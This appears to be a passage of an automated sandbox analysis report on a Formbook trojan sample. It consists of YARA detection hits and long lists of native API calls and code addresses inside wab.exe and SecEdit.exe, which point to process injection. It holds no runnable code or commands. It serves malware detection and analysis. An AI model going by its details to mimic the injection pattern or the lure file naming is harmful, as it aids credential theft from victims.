            Source: Yara matchFile source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0042B143 NtClose,4_2_0042B143
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036635C0 NtCreateMutant,LdrInitializeThunk,4_2_036635C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662B60 NtClose,LdrInitializeThunk,4_2_03662B60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03662DF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03662C70
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03664340 NtSetContextThread,4_2_03664340
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03663010 NtOpenDirectoryObject,4_2_03663010
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03663090 NtSetValueKey,4_2_03663090
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03664650 NtSuspendThread,4_2_03664650
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662BE0 NtQueryValueKey,4_2_03662BE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662BF0 NtAllocateVirtualMemory,4_2_03662BF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662BA0 NtEnumerateValueKey,4_2_03662BA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662B80 NtQueryInformationFile,4_2_03662B80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662AF0 NtWriteFile,4_2_03662AF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662AD0 NtReadFile,4_2_03662AD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662AB0 NtWaitForSingleObject,4_2_03662AB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036639B0 NtGetContextThread,4_2_036639B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662F60 NtCreateProcessEx,4_2_03662F60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662F30 NtCreateSection,4_2_03662F30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662FE0 NtCreateFile,4_2_03662FE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662FA0 NtQuerySection,4_2_03662FA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662FB0 NtResumeThread,4_2_03662FB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662F90 NtProtectVirtualMemory,4_2_03662F90
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662E30 NtWriteVirtualMemory,4_2_03662E30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662EE0 NtQueueApcThread,4_2_03662EE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662EA0 NtAdjustPrivilegesToken,4_2_03662EA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662E80 NtReadVirtualMemory,4_2_03662E80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03663D70 NtOpenThread,4_2_03663D70
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662D30 NtUnmapViewOfSection,4_2_03662D30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662D00 NtSetInformationFile,4_2_03662D00
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662D10 NtMapViewOfSection,4_2_03662D10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03663D10 NtOpenProcessToken,4_2_03663D10
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662DD0 NtDelayExecution,4_2_03662DD0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662DB0 NtEnumerateKey,4_2_03662DB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662C60 NtCreateKey,4_2_03662C60
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662C00 NtQueryInformationProcess,4_2_03662C00
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662CF0 NtOpenProcess,4_2_03662CF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662CC0 NtQueryVirtualMemory,4_2_03662CC0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662CA0 NtQueryInformationToken,4_2_03662CA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03014340 NtSetContextThread,LdrInitializeThunk,12_2_03014340
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03013090 NtSetValueKey,LdrInitializeThunk,12_2_03013090
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03014650 NtSuspendThread,LdrInitializeThunk,12_2_03014650
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030135C0 NtCreateMutant,LdrInitializeThunk,12_2_030135C0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012B60 NtClose,LdrInitializeThunk,12_2_03012B60
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_03012BA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012BE0 NtQueryValueKey,LdrInitializeThunk,12_2_03012BE0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_03012BF0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012AD0 NtReadFile,LdrInitializeThunk,12_2_03012AD0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012AF0 NtWriteFile,LdrInitializeThunk,12_2_03012AF0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030139B0 NtGetContextThread,LdrInitializeThunk,12_2_030139B0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012F30 NtCreateSection,LdrInitializeThunk,12_2_03012F30
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012FB0 NtResumeThread,LdrInitializeThunk,12_2_03012FB0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012FE0 NtCreateFile,LdrInitializeThunk,12_2_03012FE0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_03012E80
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012EE0 NtQueueApcThread,LdrInitializeThunk,12_2_03012EE0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012D10 NtMapViewOfSection,LdrInitializeThunk,12_2_03012D10
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_03012D30
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012DD0 NtDelayExecution,LdrInitializeThunk,12_2_03012DD0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_03012DF0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012C60 NtCreateKey,LdrInitializeThunk,12_2_03012C60
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_03012C70
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_03012CA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03013010 NtOpenDirectoryObject,12_2_03013010
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012B80 NtQueryInformationFile,12_2_03012B80
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012AB0 NtWaitForSingleObject,12_2_03012AB0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012F60 NtCreateProcessEx,12_2_03012F60
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012F90 NtProtectVirtualMemory,12_2_03012F90
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012FA0 NtQuerySection,12_2_03012FA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012E30 NtWriteVirtualMemory,12_2_03012E30
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012EA0 NtAdjustPrivilegesToken,12_2_03012EA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012D00 NtSetInformationFile,12_2_03012D00
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03013D10 NtOpenProcessToken,12_2_03013D10
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03013D70 NtOpenThread,12_2_03013D70
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012DB0 NtEnumerateKey,12_2_03012DB0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012C00 NtQueryInformationProcess,12_2_03012C00
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012CC0 NtQueryVirtualMemory,12_2_03012CC0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03012CF0 NtOpenProcess,12_2_03012CF0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597B70 NtCreateFile,12_2_00597B70
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597CD0 NtReadFile,12_2_00597CD0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597DC0 NtDeleteFile,12_2_00597DC0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597E60 NtClose,12_2_00597E60
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_00597FB0 NtAllocateVirtualMemory,12_2_00597FB0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFCC94 NtReadVirtualMemory,12_2_02DFCC94
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFD20F NtMapViewOfSection,12_2_02DFD20F
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C02471FB0_2_00007FF7C02471FB
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C0236AC00_2_00007FF7C0236AC0
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C0236C850_2_00007FF7C0236C85
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C023E5910_2_00007FF7C023E591
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C023B7080_2_00007FF7C023B708
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C0240FF90_2_00007FF7C0240FF9
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C023E1090_2_00007FF7C023E109
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C0246A790_2_00007FF7C0246A79
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C02428AF0_2_00007FF7C02428AF
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeCode function: 0_2_00007FF7C03200000_2_00007FF7C0320000
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004030604_2_00403060
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004010004_2_00401000
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004024604_2_00402460
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040FC1C4_2_0040FC1C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040FC234_2_0040FC23
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004044844_2_00404484
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0042D5734_2_0042D573
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004165A34_2_004165A3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040FE434_2_0040FE43
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040DEC34_2_0040DEC3
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_004026B04_2_004026B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0040DEBA4_2_0040DEBA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361D34C4_2_0361D34C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EA3524_2_036EA352
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E132D4_2_036E132D
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F03E64_2_036F03E6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363E3F04_2_0363E3F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0367739A4_2_0367739A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D02744_2_036D0274
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D12ED4_2_036D12ED
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B2C04_2_0364B2C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036352A04_2_036352A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036FB16B4_2_036FB16B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0366516C4_2_0366516C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F1724_2_0361F172
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B81584_2_036B8158
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036201004_2_03620100
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CA1184_2_036CA118
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E81CC4_2_036E81CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F01AA4_2_036F01AA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363B1B04_2_0363B1B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E70E94_2_036E70E9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EF0E04_2_036EF0E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DF0CC4_2_036DF0CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036370C04_2_036370C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036307704_2_03630770
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036547504_2_03654750
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036217EC4_2_036217EC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362C7C04_2_0362C7C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EF7B04_2_036EF7B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364C6E04_2_0364C6E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E16CC4_2_036E16CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E75714_2_036E7571
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036305354_2_03630535
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CD5B04_2_036CD5B0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F05914_2_036F0591
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036214604_2_03621460
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E24464_2_036E2446
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EF43F4_2_036EF43F
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DE4F64_2_036DE4F6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EFB764_2_036EFB76
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A5BF04_2_036A5BF0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0366DBF94_2_0366DBF9
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E6BD74_2_036E6BD7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364FB804_2_0364FB80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A3A6C4_2_036A3A6C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EFA494_2_036EFA49
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E7A464_2_036E7A46
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DDAC64_2_036DDAC6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036CDAAC4_2_036CDAAC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03675AA04_2_03675AA0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362EA804_2_0362EA80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036469624_2_03646962
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036399504_2_03639950
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364B9504_2_0364B950
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036329A04_2_036329A0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036FA9A64_2_036FA9A6
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363A8404_2_0363A840
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369D8004_2_0369D800
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036338E04_2_036338E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365E8F04_2_0365E8F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036168B84_2_036168B8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A4F404_2_036A4F40
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03672F284_2_03672F28
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03650F304_2_03650F30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EFF094_2_036EFF09
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363CFE04_2_0363CFE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03622FC84_2_03622FC8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EFFB14_2_036EFFB1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03631F924_2_03631F92
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630E594_2_03630E59
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EEE264_2_036EEE26
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036EEEDB4_2_036EEEDB
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03639EB04_2_03639EB0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03642E904_2_03642E90
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036ECE934_2_036ECE93
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E7D734_2_036E7D73
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03633D404_2_03633D40
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E1D5A4_2_036E1D5A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363AD004_2_0363AD00
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362ADE04_2_0362ADE0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364FDC04_2_0364FDC0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03648DBF4_2_03648DBF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A9C324_2_036A9C32
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03630C004_2_03630C00
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03620CF24_2_03620CF2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036D0CB54_2_036D0CB5
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309132D12_2_0309132D
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FFB2C012_2_02FFB2C0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309A35212_2_0309A352
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE52A012_2_02FE52A0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0302739A12_2_0302739A
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030A03E612_2_030A03E6
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FEE3F012_2_02FEE3F0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0308027412_2_03080274
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FCD34C12_2_02FCD34C
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030812ED12_2_030812ED
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0307A11812_2_0307A118
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE70C012_2_02FE70C0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030AB16B12_2_030AB16B
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0301516C12_2_0301516C
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030A01AA12_2_030A01AA
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030981CC12_2_030981CC
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FEB1B012_2_02FEB1B0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FCF17212_2_02FCF172
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0308F0CC12_2_0308F0CC
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030970E912_2_030970E9
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309F0E012_2_0309F0E0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FD010012_2_02FD0100
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FFC6E012_2_02FFC6E0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0300475012_2_03004750
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309F7B012_2_0309F7B0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FD17EC12_2_02FD17EC
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FDC7C012_2_02FDC7C0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE077012_2_02FE0770
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030916CC12_2_030916CC
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309757112_2_03097571
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030A059112_2_030A0591
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FD146012_2_02FD1460
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0307D5B012_2_0307D5B0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309F43F12_2_0309F43F
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309244612_2_03092446
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE053512_2_02FE0535
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0308E4F612_2_0308E4F6
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FDEA8012_2_02FDEA80
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309FB7612_2_0309FB76
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03096BD712_2_03096BD7
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0301DBF912_2_0301DBF9
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309FA4912_2_0309FA49
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03097A4612_2_03097A46
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03053A6C12_2_03053A6C
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FFFB8012_2_02FFFB80
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03025AA012_2_03025AA0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0307DAAC12_2_0307DAAC
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0308DAC612_2_0308DAC6
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE38E012_2_02FE38E0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FC68B812_2_02FC68B8
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_030AA9A612_2_030AA9A6
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FEA84012_2_02FEA840
